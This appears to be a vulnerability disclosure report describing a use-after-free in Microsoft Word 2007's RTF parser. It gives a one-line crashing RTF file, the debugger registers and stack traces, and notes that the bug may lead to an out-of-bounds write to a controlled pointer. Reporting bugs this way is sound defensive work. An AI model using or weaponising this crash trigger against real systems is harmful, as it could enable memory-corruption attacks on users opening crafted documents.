The following RTF file was observed to crash Microsoft Office 2007:

{\rtf1{\sbys\par\pmartabqr\pmartabqr{\shp}\xmlns1{\protend{\xmlclose}\xmlns2{\xmlclose}\xmlns3{\factoidname#}}}}

Crash:

First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=17fa524c ebx=00000000 ecx=034c932c edx=00000000 esi=001205f0 edi=034c93e4
eip=3125eb26 esp=001205a8 ebp=001205b8 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
wwlib!FMain+0x1a577:
3125eb26 8b00             mov     eax,[eax]         ds:0023:17fa524c=????????
0:000> k
ChildEBP RetAddr
WARNING: Stack unwind information not available. Following frames may be wrong.
001205b8 3194cf3d wwlib!FMain+0x1a577
00120614 31518bd8 wwlib!wdCommandDispatch+0x28d20a
00120a3c 31518dbf wwlib!DllGetLCID+0x98032
00120a64 31bbce31 wwlib!DllGetLCID+0x98219
00120a8c 31c6c905 wwlib!DllCanUnloadNow+0x24668
00120ccc 31bbd3f0 wwlib!DllCanUnloadNow+0xd413c
00122398 31271cd4 wwlib!DllCanUnloadNow+0x24c27
00122a68 3129ef3b wwlib!FMain+0x2d725
00123b68 3129e372 wwlib!FMain+0x5a98c
00123bac 31491319 wwlib!FMain+0x59dc3
00126d28 3149103a wwlib!DllGetLCID+0x10773
0012b14c 31490ca7 wwlib!DllGetLCID+0x10494
0012b19c 31490b52 wwlib!DllGetLCID+0x10101
0012e2f8 314909d6 wwlib!DllGetLCID+0xffac
0012e31c 313165d8 wwlib!DllGetLCID+0xfe30
0012f580 313409cb wwlib!FMain+0xd2029
0012f630 31340893 wwlib!FMain+0xfc41c
0012f648 32812493 wwlib!FMain+0xfc2e4
0012f668 32812431 mso!Ordinal6541+0x327
0012f6a0 3275f49c mso!Ordinal6541+0x2c5

Notes:

- Reproduces on Windows Server 2003 (Office 2007). Does not reproduce
on Windows 7 (Office 2010) or Windows 8.1 (Office 2013).

- Opening the test case under Office 2013 results in an error: "This
file contains custom XML elements which are no longer supported by
Word."

- The crash occurs due to an out-of-bounds read. With page heap
disabled, the crash may also be observed at 3194cf42 (which is in the
parent function of the crash at 3125eb26, in wwlib.dll
12.0.6713.5000).

- The crash can subsequently lead to an out-of-bounds write to a
controlled pointer value (at 3194CEF5 in wwlib.dll 12.0.6713.5000).

- The underlying issue appears to be a use-after-free. The first
argument (pushed at 3194CF35) of a function call to 312CCF16 is in a
free state. The relevant free operation was earlier performed by
mso!Ordinal649 (mso.dll 12.0.6683.5000) via the following stack trace
(note return value's 31518bd8 and 31518dbf are in common with the
crashing stack trace):

0011e1c8 312539cc mso!Ordinal649+0x26
0011e1e0 31253935 wwlib!FMain+0xf41d
0011e1f0 31274723 wwlib!FMain+0xf386
0011e204 320e0398 wwlib!FMain+0x30174
0011e2a0 3127fdaf wwlib!DllGetClassObject+0xfbaef
00120490 3129b039 wwlib!FMain+0x3b800
001204b0 31c7805b wwlib!FMain+0x56a8a
001204d4 31c77fce wwlib!DllCanUnloadNow+0xdf892
001205b8 3194cf89 wwlib!DllCanUnloadNow+0xdf805
00120614 31518bd8 wwlib!wdCommandDispatch+0x28d256
00120a3c 31518dbf wwlib!DllGetLCID+0x98032

- Adding control words and destinations can change the dereferenced value.

- Based on a trace of execution we can guess that the XML-related
control words are implicated in the UAF - however this couldn't be
verified with 100% certainty. One hypothesis is that the factoidname
control word holds a stale reference to an XML object that has been
freed after an xmlclose.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.